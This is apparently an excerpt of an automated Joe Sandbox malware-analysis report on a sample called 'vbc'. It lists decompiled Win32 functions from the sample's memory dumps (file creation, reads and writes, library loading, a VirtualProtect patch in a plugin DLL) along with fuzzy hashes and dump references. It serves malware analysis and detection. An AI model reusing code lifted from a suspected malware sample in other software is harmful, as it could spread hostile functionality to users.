                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: InitializeMessageSendUninitialize
                    • String ID:
                    • API String ID: 2896919175-0
                    • Opcode ID: 87b30d2b785286fdc66c83050ab24e3334c98b30792f2f1f5f727908fd7dcf92
                    • Instruction ID: aa0e5c346db56849faed3f3240e829529484723dbc79c21abe6f002b31812de8
                    • Opcode Fuzzy Hash: 87b30d2b785286fdc66c83050ab24e3334c98b30792f2f1f5f727908fd7dcf92
                    • Instruction Fuzzy Hash: 87F096735005008BD3415754AD05B577364EBC5315F49C93BEF8CA22A0DB7A48118B5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                    • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Window$EnableShow
                    • String ID:
                    • API String ID: 1136574915-0
                    • Opcode ID: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                    • Instruction ID: 6c41119d880c6e907524726e204bf21ac727531236896e2a35a455d3971ed6d0
                    • Opcode Fuzzy Hash: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                    • Instruction Fuzzy Hash: 62E01272908211CFE705EBA4EE495AE77B4EB40315710497FE501F11D1DBB94D00865D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004068E7(signed int _a4) {
                    				struct HINSTANCE__* _t5;
                    				signed int _t10;
                    
                    				_t10 = _a4 << 3;
                    				_t8 =  *(_t10 + 0x40a3e0);
                    				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                    				if(_t5 != 0) {
                    					L2:
                    					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                    				}
                    				_t5 = E00406877(_t8); // executed
                    				if(_t5 == 0) {
                    					return 0;
                    				}
                    				goto L2;
                    			}





                    0x004068ef
                    0x004068f2
                    0x004068f9
                    0x00406901
                    0x0040690d
                    0x00000000
                    0x00406914
                    0x00406904
                    0x0040690b
                    0x00000000
                    0x0040691c
                    0x00000000

                    APIs
                    • GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                      • Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                      • Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
                      • Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                    • String ID:
                    • API String ID: 2547128583-0
                    • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                    • Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
                    • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                    • Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E0040600A(WCHAR* _a4, long _a8, long _a12) {
                    				signed int _t5;
                    				void* _t6;
                    
                    				_t5 = GetFileAttributesW(_a4); // executed
                    				asm("sbb ecx, ecx");
                    				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                    				return _t6;
                    			}





                    0x0040600e
                    0x0040601b
                    0x00406030
                    0x00406036

                    APIs
                    • GetFileAttributesW.KERNELBASE(00000003,004030BD,007B6800,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                    • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                    • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                    • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405FE5(WCHAR* _a4) {
                    				signed char _t3;
                    				signed char _t7;
                    
                    				_t3 = GetFileAttributesW(_a4); // executed
                    				_t7 = _t3;
                    				if(_t7 != 0xffffffff) {
                    					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                    				}
                    				return _t7;
                    			}





                    0x00405fea
                    0x00405ff0
                    0x00405ff5
                    0x00405ffe
                    0x00405ffe
                    0x00406007

                    APIs
                    • GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405AC8(WCHAR* _a4) {
                    				int _t2;
                    
                    				_t2 = CreateDirectoryW(_a4, 0); // executed
                    				if(_t2 == 0) {
                    					return GetLastError();
                    				}
                    				return 0;
                    			}




                    0x00405ace
                    0x00405ad6
                    0x00000000
                    0x00405adc
                    0x00000000

                    APIs
                    • CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                    • GetLastError.KERNEL32 ref: 00405ADC
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CreateDirectoryErrorLast
                    • String ID:
                    • API String ID: 1375471231-0
                    • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                    • Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
                    • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                    • Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040608D(void* _a4, void* _a8, long _a12) {
                    				int _t7;
                    				long _t11;
                    
                    				_t11 = _a12;
                    				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                    				if(_t7 == 0 || _t11 != _a12) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}





                    0x00406091
                    0x004060a1
                    0x004060a9
                    0x00000000
                    0x004060b0
                    0x00000000
                    0x004060b2

                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060A1
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004060BC(void* _a4, void* _a8, long _a12) {
                    				int _t7;
                    				long _t11;
                    
                    				_t11 = _a12;
                    				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                    				if(_t7 == 0 || _t11 != _a12) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}





                    0x004060c0
                    0x004060d0
                    0x004060d8
                    0x00000000
                    0x004060df
                    0x00000000
                    0x004060e1

                    APIs
                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060D0
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			_entry_(intOrPtr _a4, intOrPtr _a8) {
                    
                    				 *0x734f5048 = _a4;
                    				if(_a8 == 1) {
                    					VirtualProtect(0x734f505c, 4, 0x40, 0x734f504c); // executed
                    					 *0x734f505c = 0xc2;
                    					 *0x734f504c = 0;
                    					 *0x734f5054 = 0;
                    					 *0x734f5068 = 0;
                    					 *0x734f5058 = 0;
                    					 *0x734f5050 = 0;
                    					 *0x734f5060 = 0;
                    					 *0x734f505e = 0;
                    				}
                    				return 1;
                    			}



                    0x734f2a88
                    0x734f2a8d
                    0x734f2a9d
                    0x734f2aa5
                    0x734f2aac
                    0x734f2ab1
                    0x734f2ab6
                    0x734f2abb
                    0x734f2ac0
                    0x734f2ac5
                    0x734f2aca
                    0x734f2aca
                    0x734f2ad2

                    APIs
                    • VirtualProtect.KERNELBASE(734F505C,00000004,00000040,734F504C), ref: 734F2A9D
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: cba72d9d65bb3c1eaea94b65d0afbd7cda36b9ef51b3022fa2ce7a7cbfd48be2
                    • Instruction ID: dfd96dcbab987fca718179b10e64d90dd0ba2f3a5777b4db7b1f12f4caccacc4
                    • Opcode Fuzzy Hash: cba72d9d65bb3c1eaea94b65d0afbd7cda36b9ef51b3022fa2ce7a7cbfd48be2
                    • Instruction Fuzzy Hash: D1F092F2940282EFC358EF2A8444B0A3FE0F74A304F2D45AAE19CF6242E3344264CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004044C2(int _a4) {
                    				struct HWND__* _t2;
                    				long _t3;
                    
                    				_t2 =  *0x7a7a38;
                    				if(_t2 != 0) {
                    					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                    					return _t3;
                    				}
                    				return _t2;
                    			}





                    0x004044c2
                    0x004044c9
                    0x004044d4
                    0x00000000
                    0x004044d4
                    0x004044da

                    APIs
                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                    • Instruction ID: ac3b44bde4cff7d728b8f73da7dc3c4418e617d20a2d9e9616a9aba5531653cc
                    • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                    • Instruction Fuzzy Hash: 4FC04C75744600BAEA148F549E45F0677546790701F14C429B641B54D0CA74D410DA2C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004034C2(long _a4) {
                    				long _t2;
                    
                    				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                    				return _t2;
                    			}




                    0x004034d0
                    0x004034d6

                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040385A,?), ref: 004034D0
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004044AB(int _a4) {
                    				long _t2;
                    
                    				_t2 = SendMessageW( *0x7a8a68, 0x28, _a4, 1); // executed
                    				return _t2;
                    			}




                    0x004044b9
                    0x004044bf

                    APIs
                    • SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                    Memory Dump Source
